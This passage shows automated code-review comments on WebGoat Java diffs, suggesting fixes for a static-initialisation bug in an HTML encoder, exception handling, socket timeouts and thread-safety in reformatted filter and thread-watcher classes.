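Review bot: `encode()` and `decode()` are static, but the `e2i`/`i2e` tables they consult are filled only inside the instance constructor `public HtmlEncoder()`, so `HtmlEncoder.encode(s)` called before any `new HtmlEncoder()` finds no entry for `<`, `>`, `&` or `"` and copies them through unchanged (the `ch > 128` fallback never fires for them) — an output encoder that silently degrades to a no-op is an XSS foothold rather than a defence. Build the maps in a static initializer placed after the `entities` array so the tables exist whenever the static methods are reachable, and leave the constructor empty. While there, the table still carries the duplicated `igrave`/`iacute`/`icirc`/`iuml` rows and the `> 128` bound leaves U+0080 itself unencoded. Separately, `decode()` throws NumberFormatException on `&#;` or `&#x41;` and StringIndexOutOfBoundsException on `&;` through `entity.charAt(0)`, so callers feeding it request data need to catch those or the method should fall back to copying the text through.
```java
static Map e2i = new HashMap();
static Map i2e = new HashMap();

// … unchanged: entities table …

static
{
    // built once at class load so the static encode()/decode() never see empty tables
    for (int i = 0; i < entities.length; i++)
    {
        e2i.put((String) entities[i][0], (Integer) entities[i][1]);
        i2e.put((Integer) entities[i][1], (String) entities[i][0]);
    }
}

public HtmlEncoder()
{
    // lookup tables are populated in the static initializer above
}
```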
@@ -20,134 +19,127 @@ import javax.servlet.ServletResponse; import javax.servlet.RequestDispatcher; import javax.servlet.http.HttpServletRequest; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author sherif koussa - Macadamian Technologies - * + * */ public class Interceptor implements Filter { - private static final String OSG_SERVER_NAME = "OSGServerName"; + private static final String OSG_SERVER_NAME = "OSGServerName"; - private static final String OSG_SERVER_PORT = "OSGServerPort"; + private static final String OSG_SERVER_PORT = "OSGServerPort"; - - /* (non-Javadoc) - * @see javax.servlet.Filter#destroy() - */ - public void destroy() - { - // TODO Auto-generated method stub - - } - - - public void doFilter(ServletRequest request, ServletResponse response, - FilterChain chain) throws IOException, ServletException - { - - HttpServletRequest req = (HttpServletRequest) request; - - Socket osgSocket = null; - PrintWriter out = null; - BufferedReader in = null; - String osgServerName = req.getSession().getServletContext() - .getInitParameter(OSG_SERVER_NAME); - String osgServerPort = req.getSession().getServletContext() - .getInitParameter(OSG_SERVER_PORT); - - try + /* + * (non-Javadoc) + * + * @see javax.servlet.Filter#destroy() + */ + public void destroy() { - //If these parameters are not defined then no communication will happen with OSG - if (osgServerName != null && osgServerName.length() != 0 - && osgServerPort != null && osgServerPort.length() != 0) - { - osgSocket = new Socket(osgServerName, Integer - .parseInt(osgServerPort)); - if (osgSocket != null) + // TODO Auto-generated method stub + + } + + public void 
doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, + ServletException + { + + HttpServletRequest req = (HttpServletRequest) request; + + Socket osgSocket = null; + PrintWriter out = null; + BufferedReader in = null; + String osgServerName = req.getSession().getServletContext().getInitParameter(OSG_SERVER_NAME); + String osgServerPort = req.getSession().getServletContext().getInitParameter(OSG_SERVER_PORT); + + try { - out = new PrintWriter(osgSocket.getOutputStream(), true); - in = new BufferedReader(new InputStreamReader(osgSocket - .getInputStream())); - //String message = "HTTPRECEIVEHTTPREQUEST,-,DataValidation_SqlInjection_Basic.aspx"; - //out.println(message); + // If these parameters are not defined then no communication will happen with OSG + if (osgServerName != null && osgServerName.length() != 0 && osgServerPort != null + && osgServerPort.length() != 0) + { + osgSocket = new Socket(osgServerName, Integer.parseInt(osgServerPort)); + if (osgSocket != null) + { + out = new PrintWriter(osgSocket.getOutputStream(), true); + in = new BufferedReader(new InputStreamReader(osgSocket.getInputStream())); + // String message = + // "HTTPRECEIVEHTTPREQUEST,-,DataValidation_SqlInjection_Basic.aspx"; + // out.println(message); - //System.out.println(in.readLine()); + // System.out.println(in.readLine()); + } + } + + } catch (UnknownHostException e) + { + e.printStackTrace(); + + } catch (IOException e) + { + e.printStackTrace(); + } finally + { + if (out != null) + { + out.close(); + } + if (in != null) + { + in.close(); + } + if (osgSocket != null) + { + osgSocket.close(); + } } - } + + String url = req.getRequestURL().toString(); + + RequestDispatcher disp = req.getRequestDispatcher(url.substring(url.lastIndexOf("WebGoat/") + + "WebGoat".length())); + + disp.forward(request, response); } - catch (UnknownHostException e) + + /* + * (non-Javadoc) + * + * @see javax.servlet.Filter#init(javax.servlet.FilterConfig) + */ + 
public void init(FilterConfig arg0) throws ServletException { - e.printStackTrace(); + // TODO Auto-generated method stub } - catch (IOException e) - { - e.printStackTrace(); - } - finally - { - if (out != null) - { - out.close(); - } - if (in != null) - { - in.close(); - } - if (osgSocket != null) - { - osgSocket.close(); - } - } - - String url = req.getRequestURL().toString(); - - RequestDispatcher disp = req.getRequestDispatcher(url.substring(url - .lastIndexOf("WebGoat/") - + "WebGoat".length())); - - disp.forward(request, response); - - } - - - /* (non-Javadoc) - * @see javax.servlet.Filter#init(javax.servlet.FilterConfig) - */ - public void init(FilterConfig arg0) throws ServletException - { - // TODO Auto-generated method stub - - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java b/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java index fdd4f6a42..f4559dbcd 100644 --- a/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java +++ b/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java 
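Review bot: `Integer.parseInt(osgServerPort)` in doFilter sits outside what the two catch clauses cover, so a non-numeric `OSGServerPort` init parameter raises NumberFormatException out of the filter and the request is never forwarded; only UnknownHostException and IOException are caught. Both parameters are re-read from the servlet context on every request while `init(FilterConfig)` is left as an empty stub, so parsing and validating the port once in init (rejecting it with a ServletException or disabling the OSG call) and keeping an `int` field would remove the per-request failure path. `new Socket(osgServerName, port)` also has no connect timeout, so an unreachable OSG host stalls every request that passes through this filter; `Socket s = new Socket(); s.connect(new InetSocketAddress(osgServerName, port), CONNECT_TIMEOUT_MS);` with a documented constant bounds that. The `if (osgSocket != null)` test after the constructor is always true and can go, and `e.printStackTrace()` in both catch blocks should become a log call so connection failures to OSG are visible in the server log rather than stderr.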
@@ -1,117 +1,103 @@ + package org.owasp.webgoat.util; import java.util.BitSet; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - *@author jwilliams@aspectsecurity.com - *@created November 6, 2002 + * + * @author jwilliams@aspectsecurity.com + * @created November 6, 2002 */ public class ThreadWatcher implements Runnable { - // time to live in milliseconds - private BitSet myInterrupted; + // time to live in milliseconds + private BitSet myInterrupted; - private Process myProcess; + private Process myProcess; - private int myTimeout; + private int myTimeout; + /** + * Constructor for the ThreadWatcher object + * + * @param p + * Description of the Parameter + * @param interrupted + * Description of the Parameter + * @param timeout + * Description of the Parameter + */ + public ThreadWatcher(Process p, BitSet interrupted, int timeout) + { + myProcess = p; - /** - * Constructor for the ThreadWatcher object - * - *@param p Description of the Parameter - *@param interrupted Description of the Parameter - *@param timeout Description of the Parameter - */ - public ThreadWatcher(Process p, BitSet interrupted, int timeout) - { - myProcess = p; - - // thread used by whoever constructed this watcher - myTimeout = timeout; - myInterrupted = interrupted; - } - - - /* - * Interrupt the thread by marking the interrupted bit and killing the process - */ - - /** - * Description of the Method - */ - public void interrupt() - { - myInterrupted.set(0); - - // set interrupted bit (bit 0 of the bitset) to 1 - myProcess.destroy(); + // thread used by whoever constructed this watcher + 
myTimeout = timeout; + myInterrupted = interrupted; + } /* - * try - * { - * myProcess.getInputStream().close(); - * } - * catch( IOException e1 ) - * { - * / do nothing -- input streams are probably already closed - * } - * try - * { - * myProcess.getErrorStream().close(); - * } - * catch( IOException e2 ) - * { - * / do nothing -- input streams are probably already closed - * } - * myThread.interrupt(); + * Interrupt the thread by marking the interrupted bit and killing the process */ - } + /** + * Description of the Method + */ + public void interrupt() + { + myInterrupted.set(0); - /** - * Main processing method for the ThreadWatcher object - */ - public void run() - { - try - { - Thread.sleep(myTimeout); - } - catch (InterruptedException e) - { - // do nothing -- if watcher is interrupted, so is thread + // set interrupted bit (bit 0 of the bitset) to 1 + myProcess.destroy(); + + /* + * try { myProcess.getInputStream().close(); } catch( IOException e1 ) { / do nothing -- + * input streams are probably already closed } try { myProcess.getErrorStream().close(); } + * catch( IOException e2 ) { / do nothing -- input streams are probably already closed } + * myThread.interrupt(); + */ } - interrupt(); - } + /** + * Main processing method for the ThreadWatcher object + */ + public void run() + { + try + { + Thread.sleep(myTimeout); + } catch (InterruptedException e) + { + // do nothing -- if watcher is interrupted, so is thread + } + + interrupt(); + } } diff --git a/main/project/config/JavaStyle_WebGoat.xml b/main/project/config/JavaStyle_WebGoat.xml new file mode 100644 index 000000000..a7c2178e2 --- /dev/null +++ b/main/project/config/JavaStyle_WebGoat.xml 
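Review bot: The comment `// time to live in milliseconds` is attached to `myInterrupted` rather than `myTimeout`, the field that `Thread.sleep(myTimeout)` in run() actually uses; move it above `private int myTimeout;` and give the BitSet its own comment, e.g. `// bit 0 is set once the watched process has been destroyed on timeout`. The BitSet is written by the watcher thread in interrupt() and presumably read by whoever constructed the watcher, but BitSet is not thread-safe and no synchronization is visible in this file, so the reader is not guaranteed to observe the set bit; the expected synchronization should be documented on the constructor's `interrupted` parameter or the access guarded. The catch in run() also drops the interrupt status; if "do nothing" is intentional, `Thread.currentThread().interrupt();` before the call to interrupt() preserves it for any caller further up the stack.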
@@ -0,0 +1,264 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +